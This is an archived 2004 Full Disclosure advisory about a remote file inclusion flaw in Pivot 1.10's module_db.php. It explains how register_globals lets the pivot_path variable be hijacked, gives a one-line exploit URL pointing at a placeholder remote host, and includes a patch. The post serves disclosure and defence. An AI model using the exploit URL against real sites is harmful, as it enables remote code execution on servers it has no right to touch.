Full Disclosure mailing list archives
Pivotlog - Remote Code Execution
From: "loofus" <loofus () 0x90 org>
Date: Mon, 14 Jun 2004 16:59:58 -0400 (EDT)
Pivot 1.10 Soundwave - Remote Code Execution -------------------------------------------- loofus - 0x90.org Greets: ------- Downbload, nummish, peace, war-cow, rest of 0x90.org. Description: ------------ Pivot is a tool to create weblogs, without the need of a database. Pivot is easy to setup, easy to maintain and even easier to work with. All data is stored using flat files. MySQL or other databases are not required, just plain PHP. Vulnerability: -------------- The vulnerability is a remote file inclusion (hmm been seeing to many of these lately). Anywas, the vulnerability lies within a class file called module_db.php which is accessible individually. By supplying a malicious path variable the attack is able to include any file he/she wishes and is able to include remote php code allowing local system access as whatever user PHP is runs scripts as most likely www-data. --- module_db.php --- // for now, we'll just use the xml / flat-file module.. include_once $pivot_path."modules/module_db_xml.php"; class db { --- module_db.php --- No check is done on module_db.php as it is assumed that noone will actually individually visit this file as it contains a class interface. The idea behind this is to include this file somewhere else within the code execution so that $pivot_path is properly set. However if register_globals is set to on within php.ini the attacker is able to hijack the variable $pivot_path and point it to somewhere else ("http://xxxxx/includes/module_db_xml.php"). Exploitation: ------------- http://xxxxx/pivot/modules/module_db.php?pivot_path=http://xxxxxx Interesting: ------------ "Results 1 - 10 of about 28,600 for "Powered by Pivot". (0.78 seconds)" Fix: ---- --- module_db.php Wed Feb 11 16:29:04 2004 +++ module_db.phpfix Fri May 28 22:36:07 2004 @@ -10,6 +10,10 @@ // Patch to fix remote include - loofus (0x90) // --------------------------------------------------------------------------- +/* Make sure user cannot include remote files */ +if(isset($_GET['pivot_path']) || isset($_POST['pivot_path']) || isset($_COOKIE['pivot_path'])) + die("No remote include for you!\n"); + // for now, we'll just use the xml / flat-file module.. include_once $pivot_path."modules/module_db_xml.php"; Download it here: http://0x90.org/~loofus/pivot1.10-soundwave.patch -- Alex "loofus" Buck _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- Pivotlog - Remote Code Execution loofus (Jun 14)